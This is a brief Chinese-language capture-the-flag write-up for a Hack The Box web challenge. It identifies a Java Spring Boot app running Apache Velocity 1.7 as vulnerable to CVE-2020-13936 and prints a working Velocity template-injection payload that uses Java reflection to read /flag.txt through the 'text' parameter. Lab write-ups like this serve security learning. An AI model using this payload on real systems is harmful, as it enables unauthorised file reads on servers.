题目靶场地址：https://ctf.hackthebox.com/

先启动环境再下载项目文件：

项目文件压缩包解压密码：hackthebox

访问项目环境页面，是一个简单的web，输入什么就输出什么，直接看项目文件，是一个java springboot项目
阅读源码发现使用了org.apache.velocity（1.7版本），从maven仓库得知2.2版本以下存在漏洞CVE-2020-13936.
然后exploit-db有相关复现：https://www.exploit-db.com/exploits/46731

参考复现构建自己的payload

${name.getClass().forName("java.nio.file.Files").readAllLines(${name.getClass().forName("java.nio.file.Paths").get("/flag.txt")})}

转义后通过text参数传递给后端完成注入，读取flag